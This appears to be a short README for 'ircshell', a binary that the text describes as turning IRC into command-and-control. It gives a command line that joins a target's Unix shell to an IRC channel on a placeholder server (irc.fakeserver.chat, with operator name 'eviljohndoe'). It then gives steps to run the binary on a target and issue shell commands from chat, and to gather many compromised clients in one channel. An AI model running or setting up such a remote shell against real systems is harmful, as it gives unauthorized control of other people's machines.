A binary to chat with your unix shells on IRC, a binary to utilize IRC software as C2.
Orignally made by Aalekh Motani.
Usage:
To get the help menu: ./ircshell -h
.
All options: ./ircshell -s [IRC server ip or domain] -c [channel to join] -u [username to join with] -a [username you have to join with ircclients, user who is waiting for output]
.
Example: ./ircshell -s irc.fakeserver.chat -c fakechannel -u johndoe -a eviljohndoe
.
Here I am using my own IRC server
Step1: Join a channel on IRC client. The username you provide here is the username you have to pass to -a switch and channel to -c switch.
Step2: Run the binary on target.
Step3: Run the unix command you like from the chat.
Run the binary on different clients and get them all at one channel to Command and Control them.
License GPLv3+: GNU GPL version 3 or later https://gnu.org/licenses/gpl.html
This is free software: you are free to change and redistribute it.